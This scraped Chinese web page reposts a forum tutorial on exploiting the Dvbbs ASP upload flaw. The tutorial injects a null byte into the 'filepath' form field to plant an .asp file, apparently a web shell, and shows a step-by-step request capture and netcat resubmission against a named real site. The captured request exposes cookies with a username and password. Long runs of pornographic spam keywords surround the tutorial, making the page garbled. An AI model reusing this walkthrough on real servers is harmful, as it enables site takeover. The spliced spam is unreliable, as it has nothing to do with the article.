成人性生交大片免费看视频r_亚洲综合极品香蕉久久网_在线视频免费观看一区_亚洲精品亚洲人成人网在线播放_国产精品毛片av_久久久久国产精品www_亚洲国产一区二区三区在线播_日韩一区二区三区四区区区_亚洲精品国产无套在线观_国产免费www

主頁(yè) > 知識(shí)庫(kù) > asp 之上傳漏洞終結(jié)篇

asp 之上傳漏洞終結(jié)篇

熱門標(biāo)簽:離線電子地圖標(biāo)注軟件注冊(cè) 企數(shù)外呼系統(tǒng)能用多久 外呼回?fù)芟到y(tǒng)圖片 常用地圖標(biāo)注范圍點(diǎn) 為什么外呼系統(tǒng)需要預(yù)存話費(fèi)呢 寧夏怎么申請(qǐng)400電話 辦理400電話一年多少錢 蘭州智能語(yǔ)音電銷機(jī)器人功能 咸陽(yáng)銷售外呼系統(tǒng)
收藏關(guān)于上傳漏洞的文章,最近一直遇到這個(gè)麻煩,
作者:szjwwwww     
出自:黑鷹基地論壇
http://www.3800cc.com
一、寫在前面
***這個(gè)上傳漏洞利用的原理只是針對(duì)form格式上傳的asp和php腳本***
NC(Netcat)
用于提交 數(shù)據(jù)包
DOS界面下運(yùn)行:
   NC -vv www.***.com 801.txt
   -vv: 回顯
   80:  www端口
   1.txt: 就是你要發(fā)送的數(shù)據(jù)包
  (更多使用方法請(qǐng)查看本區(qū)的帖子) 
WSE(WSockExpert)
   對(duì)本機(jī)端口的監(jiān)視,抓取IE提交的數(shù)據(jù)包
  (不會(huì)用的就自己到網(wǎng)上搜資料N多)
二、漏洞原理
下面例子假設(shè)的前提
www主機(jī):  www.***.com;
bbs路徑 :  /bbs/
漏洞源于對(duì)動(dòng)網(wǎng)上傳文件的研究,建議有一定編程經(jīng)驗(yàn)的
看看Dvbbs的upfile.asp文件,沒有必要全部看懂
upfile是通過(guò)生成一個(gè)form表上傳,
用到的變量:
filepath 默認(rèn)值uploadface 屬性hiden
act      默認(rèn)值upload     屬性hiden
file1    就是你要傳的那個(gè)文件
關(guān)鍵是 filepath 這個(gè)變量!
默認(rèn)情況下我們的文件上傳到www.***.com/bbs/uploadface/
文件是用你的上傳時(shí)間命名的,就是upfile里的這一句
FileName=FormPathyear(now)month(now)day(now)hour(now)minute(now)second(now)ranNum"."FileExt
-------------------------------------------------------------------------
我們知道計(jì)算機(jī)里面的數(shù)據(jù)是一"\0"為標(biāo)致的用過(guò)C語(yǔ)言的都知道
char data[]="bbs"
這個(gè)data數(shù)組長(zhǎng)度是4: b b s \0
如果我們構(gòu)造filepath如下,會(huì)怎么樣呢?
filepath="/newmm.asp\0"
我們?cè)?004.09.24.08.24傳的文件就會(huì)發(fā)生變化
沒有改時(shí):
http://www.***.com/bbs/uploadface/200409240824.jpg
用我們構(gòu)造的filepath時(shí):
http://www.***.com/newmm.asp\0/200409240824.jpg
這樣當(dāng)服務(wù)器接收f(shuō)ilepath數(shù)據(jù)時(shí),檢測(cè)到newmm.asp后面的\0
就理解為filepath的數(shù)據(jù)就結(jié)束了
這樣我們上傳的文件,比如c:\1.asp
就保存成: http://www.***.com/newmm.asp
三、后期補(bǔ)充
漏洞公布以后很多網(wǎng)站做了相應(yīng)的處理,但是對(duì)于filepath的過(guò)濾和處理都不行
有很多網(wǎng)站只是加了N個(gè)hiden屬性的變量對(duì)付網(wǎng)上公布的upfile.exe就是那個(gè)
上傳漏洞利用工具或者filepath變量利用工具(老兵的)...但是最基本的沒改啊。。
而且很對(duì)網(wǎng)站的插件里有類似的漏洞,我要說(shuō)的不要依賴哪些專門的工具 
自己改WSE抓到的包里的filepath變量,然后在用NC提交。。。
就算他加N個(gè)hiden變量也于事無(wú)補(bǔ)。
當(dāng)然,如果對(duì)filepath做了很嚴(yán)格的過(guò)濾的話我們的這些理論就將宣告終結(jié)
就是我們的新理論誕生的時(shí)候!
四、漏洞列表
http://dvd.3800cc.com/dispbbs.asp?BoardID=20ID=5369
http://dvd.3800cc.com/dispbbs.asp?BoardID=20ID=5530
http://dvd.3800cc.com/dispbbs.asp?BoardID=20ID=5531
http://dvd.3800cc.com/dispbbs.asp?BoardID=20ID=5693
http://dvd.3800cc.com/dispbbs.asp?BoardID=20ID=5731
http://dvd.3800cc.com/dispbbs.asp?BoardID=20ID=5746
監(jiān)聽外部主機(jī)
        NC [-options] hostname port[s] [ports] ...
監(jiān)聽本地主機(jī)
        NC -l -p port [options] [hostname] [port]
options:
        -d              detach from console, stealth mode
        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual  or ranges: m-n [inclusive]
詳細(xì)實(shí)例:
---------------------------------------------------------------------------------
一、WSE抓包結(jié)果(存到1.txt里):
POST /bbs/upPhoto/upfile.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.xin126.com/bbs/upPhoto/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: www.xin126.com
Content-Length: 1969
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84
-----------------------------7d423a138d0278
Content-Disposition: form-data; name="filepath"
../medias/myPhoto/
-----------------------------7d423a138d0278
... ...
上傳
-----------------------------7d423a138d0278--
---------------------------------------------------------------------------------
二、UltraEdit打開1.txt改數(shù)據(jù):
......
-----------------------------7d423a138d0278
Content-Disposition: form-data; name="filepath"
/newmm.asp█                 ===這個(gè)黑色代表一個(gè)空格是 0x20,改成0x00就可以了
......
三、重新計(jì)算cookies長(zhǎng)度,然后nc提交
Nc -vv www.xin126.com 80 1.txt
UltraEdit是一個(gè)16位編輯器網(wǎng)上可以下載得到
我們主要用來(lái)寫那個(gè)結(jié)束標(biāo)致: \0 ====>16位表示:0x00或者00H
其實(shí)你改的時(shí)候就直接再filepath的結(jié)尾 
處加個(gè)00就OK了
計(jì)算cookies長(zhǎng)度===>你把fillepath改了之后、肯定是或+或—cookies的長(zhǎng)度變了
......
Host: www.xin126.com
Content-Length: 1969  ======就是這個(gè)
Connection: Keep-Alive
Cache-Control: no-cache
......
計(jì)算會(huì)吧?一個(gè)字母、數(shù)字就是1
對(duì)于上傳漏洞提出的解決思路:(僅供參考)
1、一般的上傳是把上傳路徑作為一個(gè)變量來(lái)處理
===>我們的對(duì)策就是把filepath變成常量。。。
這個(gè)方法是目前最有效的(我認(rèn)為的) 
2、加強(qiáng)對(duì)于\0的處理,原來(lái)我們是讀到這里就結(jié)束
我們繼續(xù)讀直道下一個(gè)變量開始的地方,處理就OK了

標(biāo)簽:鐵嶺 家電維修 昌都 溫州 泰州 昆明 麗江 咸陽(yáng)

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《asp 之上傳漏洞終結(jié)篇》,本文關(guān)鍵詞  asp,之,上傳,漏洞,終結(jié),篇,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《asp 之上傳漏洞終結(jié)篇》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于asp 之上傳漏洞終結(jié)篇的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    韩国三级电影在线观看婷婷| 欧美日韩免费在线| 一本大道av伊人久久综合| 中文字幕乱码在线观看| 不卡的在线视频| 成人激情久久| 日韩理论片网站| 毛片在线免费播放| 久久中文亚洲字幕| 欧美在线观看日本一区| eeuss鲁一区二区三区| 国产一区二区在线影院| 无码人妻丰满熟妇啪啪网站| 永久久久久久| 奇米视频888战线精品播放| 国产一区二区麻豆| 极品白嫩少妇无套内谢| 少妇久久久久久久| 丰满少妇在线观看资源站| 欧美精品一区二区三区蜜桃| 欧美偷窥清纯综合图区| 国产精品无码电影在线观看| 丝袜一区二区三区| 国产精品欧美综合在线| 99精品视频一区| 调教在线观看| 欧美影院久久久| 一区二区三区视频在线观看视频| 中文日产幕无线码一区二区| 一区二区三区视频在线观看| 中文字幕亚洲影视| 中文在线观看av| 国产乱人伦偷精品视频免下载| 99久久一区三区四区免费| 国产 国语对白 露脸| 国产精品一区二区在线观看| 欧美一级久久久久久久久大| 日韩精品极品在线观看| 中文字幕av在线播放| 一二三级黄色片| 天堂在线精品视频| 尤蜜粉嫩av国产一区二区三区| 老司机福利在线视频| 在线国产中文字幕| 91精品视频在线| 久久久之久亚州精品露出| 可以在线观看的黄色| 欧美精选一区| 五月婷婷六月综合| 欧美精品在线网站| 国产五月天婷婷| 国产精品视频久久久久久久| 高清孕妇孕交╳╳交| 小说区图片区综合久久亚洲| 国产精品户外野外| 日韩中文在线播放| 福利电影在线| 欧美另类z0zx974| 亚洲妇女无套内射精| 成人免费视频网站入口| 欧美精品日韩综合在线| 国产特级淫片免费看| 国产精品婷婷| 先锋在线亚洲| 亚洲人成网站在线播| 黄网址在线播放免费| 免费观看h电影在线观看| 欧美日韩精品一区二区天天拍小说| 精品一区在线| 国产97在线 | 亚洲| 欧美日韩hd| 欧美日韩在线播放一区| 97se亚洲国产综合在线| 91视频免费看片| 免费欧美一区| 亚洲黄网在线观看| 亚洲精品视频久久久| 波多野结衣xxxx| 三级黄色片免费看| 九九热这里只有在线精品视| 黄色三级生活片| 精品成人无码久久久久久| 欧美日本韩国一区二区三区视频| av男人一区| 蝴蝶中文综合娱乐网| 国产亚洲精品精品国产亚洲综合| 黄色免费观看网站| 亚洲免费观看高清完整| 好吊日在线视频| 国产伦精品一区二区三区视频我| 91av国产在线| 国产精品电影网站| 精品熟妇无码av免费久久| 第一sis亚洲原创| 欧美精品久久一区| 激情五月俺来也| 欧美精品情趣视频| 久草福利在线| 亚洲精品国产拍免费91在线| 澳门成人av网| 性一交一乱一区二区洋洋av| 国产成人精品一区二区三区福利| 亚洲男人的天堂在线aⅴ视频| 少妇在线看www| 中文字幕在线视频免费观看| 国产精品扒开腿做爽爽爽男男| 日本男女交配视频| 亚洲美女又黄又爽在线观看| 婷婷色中文字幕| 图片区小说区区亚洲五月| 国产日韩欧美二区| 国产福利一区二区精品秒拍| 国产伦精品一区二区三区四区视频| 中文字幕天天干| 国产在线观看免费av| 亚洲欧洲午夜一线一品| 成人免费a级片| 精品国产91久久久久久久妲己| 国内精品偷拍| 嫩草影院视频| 川上优的av在线一区二区| 国产玉足榨精视频在线观看| 午夜免费看毛片| 国产亚洲精品aa| 91av手机在线| 狠狠色综合播放一区二区| 日韩精品有码在线观看| 国产h视频在线观看| 色综合av综合无码综合网站| 91tv官网精品成人亚洲| 在线电影中文字幕| 亚洲日韩欧美视频| 欧美一级片中文字幕| 护士精品一区二区三区| 免费在线视频你懂得| 在线观看国产小视频| 国产丝袜欧美中文另类| 免费成人看片网址| 在线播放/欧美激情| 日本免费视频www| 国产精品免费视频一区二区三区| 羞羞影院欧美| 视频区 图片区 小说区| 免费a级观看| 一本久道久久综合婷婷鲸鱼| 98精品视频| 成人中文字幕在线| 中文字幕麻豆| 国产日韩欧美一区二区三区四区| 亚洲猫色日本管| 成人精品一区二区不卡视频| 国产精品第72页| 看一级黄色录像| 九九亚洲视频| 亚洲精品国产精| 青青草原在线亚洲| 四虎1515hh.com| 国产精品zjzjzj在线观看| 91视频在线视频| 本网站久久精品| 国产香蕉视频在线观看| 欧美男男gaytwinkfreevideos| 久久精品国产91精品亚洲| 日韩一级在线免费观看| 老牛影视av牛牛影视av| 久久精品成人欧美大片| 奇米4444一区二区三区| 亚洲精品成a人ⅴ香蕉片| 97人人爽人人| 成人在线免费看| 无码人妻精品一区二区蜜桃百度| 我的公把我弄高潮了视频| 亚洲最新免费视频| 精品一区三区| 99精品电影| 999国产精品视频| 麻豆网站在线看| 中文人妻熟女乱又乱精品| 国产伦子伦对白在线播放观看| 无码日韩人妻精品久久蜜桃| 国产精品污网站| 色综合天天色| 亚洲午夜精品久久久久久久久久久久| 能在线观看的av网站| 97在线观视频免费观看| 国产在线视频你懂的| 999精品嫩草久久久久久99| 亚洲成人a**址| 欧美日本在线一区| 欧美日韩国产精选| 92裸体在线视频网站| 91网站在线免费观看| 黄色另类av| 亚洲永久在线观看| 视频一区二区不卡| 欧美在线观看网址综合| 国产永久免费视频| 国产精品久久精品牛牛影视| 精品呦交小u女在线| 欧美成人aaaaⅴ片在线看| 香港日本韩国三级| 芬兰videosfree性少妇| 欧美亚洲精品一区二区| 1区1区3区4区产品乱码芒果精品| 亚洲欧美日韩中文在线| 婷婷亚洲精品| 欧美在线在线| 欧美日韩99| 四虎国产精品永远| 久久久久久久综合日本| 日本精品久久久久中文字幕| 殴美一级黄色片| 黄色日韩网站| 在线国产精品播放| 97超视频免费观看| 天天干天天插天天操| 黄色在线免费播放| 国产精品精品| 亚洲熟妇无码乱子av电影| 成人h动漫精品一区二| 亚洲欧美日韩在线高清直播| 日韩日韩日韩日韩日韩| 欧美大喷水吹潮合集在线观看| 亚洲视频欧美在线| 亚洲性猛交富婆| 99热这里只有精品7| 亚洲精品粉嫩美女一区| 国产高清视频一区三区| 亚洲高清毛片一区二区| 国产91精品入口| 国产奶水涨喷在线播放| 一道精品视频一区二区三区图片| 中文字幕人妻一区二区三区在线视频| 在线观看免费国产视频| 韩国毛片一区二区三区| 国户精品久久久久久久久久久不卡| 日韩在线免费观看视频| xfplay资源站夜色先锋5566| 精品视频一区二区三区四区| 欧美日韩视频在线一区二区| 精品国产一区二区三区性色av| 伊人久久大香线蕉av一区| 国精产品999国精产品官网| 亚洲第一av色| 超黄网站在线观看| 亚洲激情小视频| а√最新版在线天堂| 国产一级免费视频| 国产人妖乱国产精品人妖| jizzjizz日本护士视频| 亚洲av无码国产综合专区| 欧美日韩国产一级二级| 在线观看免费91| 国产国语亲子伦亲子| 婷婷在线精品视频| 男人天堂avav| 国产成人久久精品77777最新版本| 寂寞少妇一区二区三区| 四虎影视最新网站入口在线观看| 国产精品欧美综合| 日本激情视频网| 国产亚洲欧洲高清一区| 午夜久久免费观看| 亚洲蜜桃视频| 欧美亚洲精品日韩| 日韩av毛片网| 嫩草国产精品入口| 精品国产电影一区二区| 亚洲国产精久久久久久久| av电影在线观看| 欧美午夜免费电影| 欧美日本韩国一区二区| 午夜诱惑痒痒网| 天天综合天天做天天综合| 国产女同无遮挡互慰高潮91| sdde在线播放一区二区| 国产亚洲一区字幕| 国产成人一区在线| 黄色一级片播放| 一区二区久久久久久| 国产福利在线导航| 日韩欧美一区二区三区在线| 水野朝阳av一区二区三区| 蜜臀久久久久久999| 99re成人精品视频| 欧美大片免费观看在线观看网站推荐| 欧美午夜精品理论片a级大开眼界| 欧美极品少妇xxxxⅹ喷水| 亚洲熟妇av乱码在线观看| 欧美激情一级二级| 国产精品午夜久久久久久| va天堂va亚洲va影视| 超碰成人在线免费观看| 黄色三级视频在线观看| 日韩福利在线观看| 韩日欧美一区二区三区| 欧美日韩国产另类一区| 国产精品一区二区久久久久| 免费av毛片在线看| 国产精品伦理久久久久久| 主播大秀视频在线观看一区二区| 欧洲精品在线观看| 婷婷综合福利| 欧美日韩极品在线观看一区| av电影院在线看| 精品视频久久| 国产精品二区三区四区| 懂色av粉嫩av蜜臀av一区二区三区| h文在线观看免费| 丰满人妻一区二区三区53号| 综合综合综合综合综合网| 国产精品午夜久久| 美女在线视频一区二区| 日本中文字幕一级片| 久久6精品影院| 国产视频一区二区三区四区五区| 欧日韩一区二区三区| 久久久久亚洲av无码专区喷水| 国产一区不卡视频| 中文字幕在线播出| 午夜激情在线视频| 欧美精品第一页| 日韩的一区二区| 手机在线视频你懂的| 91精品视频观看| 在线中文字幕资源| 国产香蕉精品视频一区二区三区| 亚洲第一综合网|